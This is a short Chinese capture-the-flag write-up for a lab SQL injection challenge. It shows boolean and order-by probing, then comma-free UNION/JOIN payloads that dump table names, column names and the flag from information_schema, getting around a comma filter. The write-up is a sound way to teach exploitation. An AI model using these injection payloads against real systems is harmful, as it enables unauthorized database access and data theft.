# [春秋云实企安殿]SQLi


# [春秋云实企安殿]SQLi

直接打开靶机地址会跳转到 `/b68a89d1c4a097a9d8631b3ac45e8979.php` ，查看页面源代码看到提示

![image-20240309102824846](http://cdn.wutongliran.top/img/image-20240309102824846.png)

而这正是个坑，真正有注入漏洞的地址在 302 回包的内容里

![image-20240309103513737](http://cdn.wutongliran.top/img/image-20240309103513737.png)

通过 `/l0gin.php?id=1%27and%201=1%23` 和 `/l0gin.php?id=1%27and%201=2%23` 可以判断存在 sql 注入漏洞且为字符型

![image-20240309105546560](http://cdn.wutongliran.top/img/image-20240309105546560.png)

![image-20240309105602392](http://cdn.wutongliran.top/img/image-20240309105602392.png)

`/l0gin.php?id=1%27order%20by%202%23`和`/l0gin.php?id=1%27order%20by%203%23`判断有2个回显位置

fuzz出逗号被截断，用无逗号注入

查库名

```
l0gin.php?id=-1%27 union select * from (select 1) a join (select group_concat(table_name) from information_schema.tables where table_schema=database()) b %23
```

查表名

```
l0gin.php?id=-1%27 union select * from (select 1) a join (select group_concat(column_name) from information_schema.columns where table_name='users') b %23
```

查flag

```
l0gin.php?id=-1%27 union select * from (select 1) a join (select flag_9c861b688330 from users) b %23
```